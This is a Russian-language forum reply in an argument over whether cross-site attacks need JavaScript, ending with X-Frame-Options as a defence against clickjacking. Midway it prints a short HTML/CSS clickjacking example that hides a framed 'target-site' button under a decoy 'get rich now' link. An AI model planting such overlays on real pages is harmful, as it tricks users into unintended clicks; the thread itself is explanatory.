> «disable 3rd-side cookies»ты издеваешь чтоле? троллишь? какие ещё "3rd-side cookies"??? страничка сайта которая загружена внутри iframe -- загружается СО ВСЕМИ СВОИМИ куками!!!
> покажи мне кросс-сайтовую атаку без js, plz
ты хочешь чтобы я тебе щаз чтоле начал писать тут код??? не жирноли??????
...вобщето ДАЖЕ CSRF-атаку можно провести без javascript, не только Clickjacking... потомучто -- для iframe не нужен javascript... и даже более того -- Javascript не имеет полномочий к внутренностям чужой iframe-document-object-model
(javascript РАЗУМЕЕТСЯ-НУЖЕН для проведения XSS-атаки.. но про XSS-атаку мы тут вообщето ничего не говорим... Clickcjacking это НЕ разновидность XSS... CSRF это тоже НЕ разновидность XSS... это три совершенно разных направления. и ещё остаются направления: PHP-Injection и SQL-Injection -- они тоже все не связаны с Javascript)
..нащёт примера Clickjacking без javascript -- ды легко --
< style >
iframe { /* iframe from facebook.com */
width:300px;
height:100px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
< /style >
< div >Click on the link to get rich now:</div>
< iframe src="http://target-site/PLUS_ONE_BUTTON.html" >< /iframe >
< a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>
этот пример я взял с первого попавлегося сайта.. при этом это ПРОСТОЙ пример без использования overflow:hidden [с помощью "overflow:hidden" можно отрезать из iframe ненужные куски]
> это поле и нестандартно, и ненужно
предположим у меня есть сайт... напиши мне тогда ХОТЯБЫ ОДИН верный способ как мне защитить свой сайт от Clickjacking?
ты удивишься но ТОЛЬКО "X-Frame-Options: ..." может помочь... несмотря на всю свою нестандартность xD
...да я согласен что нестандартный поля это плохо... но пусть тогда разрабы вообще отменят iframe из браурезов и из W3C .. я буду только ЗА! :-)